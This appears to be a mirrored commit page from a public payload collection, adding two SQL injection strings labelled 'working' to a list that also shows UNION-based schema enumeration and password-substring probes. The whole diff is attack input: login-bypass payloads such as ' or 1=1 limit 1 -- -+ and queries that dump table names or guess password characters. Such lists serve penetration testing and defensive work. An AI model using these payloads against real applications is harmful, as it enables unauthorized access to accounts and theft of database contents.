mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-05 11:05:29 +00:00
Added 2 working sql injection lines
This commit is contained in:
parent
7dda79bfc1
commit
a4411ae086
@ -117,4 +117,5 @@
|
|||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
||||||
admin' and substring(password/text(),1,1)='7
|
admin' and substring(password/text(),1,1)='7
|
||||||
' and substring(password/text(),1,1)='7
|
' and substring(password/text(),1,1)='7
|
||||||
|
' or 1=1 limit 1 -- -+
|
||||||
|
'="or'
|
||||||
|
Loading…
Reference in New Issue
Block a user